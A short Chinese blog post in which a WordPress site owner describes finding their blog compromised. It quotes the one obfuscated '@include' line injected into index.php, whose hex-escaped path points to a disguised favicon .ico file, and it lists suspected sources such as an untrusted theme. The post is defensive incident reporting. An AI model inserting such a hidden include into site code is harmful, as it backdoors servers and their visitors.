最近我的博客访问速度非常慢,怀疑被挂马了,一看果然如此。
打开wordpress根目录下面的index.php,发现多了一行代码:
@include "\x2fh\x6fm\x65/\x73n\x61i\x6ct\x6fd\x61y\x38s\x66n\x32a\x73i\x73l\x74t\x69o\x37d\x72a\x65y\x2fw\x77w\x72o\x6ft\x2fw\x70-\x69n\x63l\x75d\x65s\x2fi\x6da\x67e\x73/\x77l\x77/\x66a\x76i\x63o\x6e_\x363\x664\x644\x2ei\x63o";
来到https://tool.lu/js网站进行解码:
然后打开这个文件,是这样的:
初步怀疑:
1、前不久用过一个来历不明的主题。
2、前不久在空间打包了一个rar文件。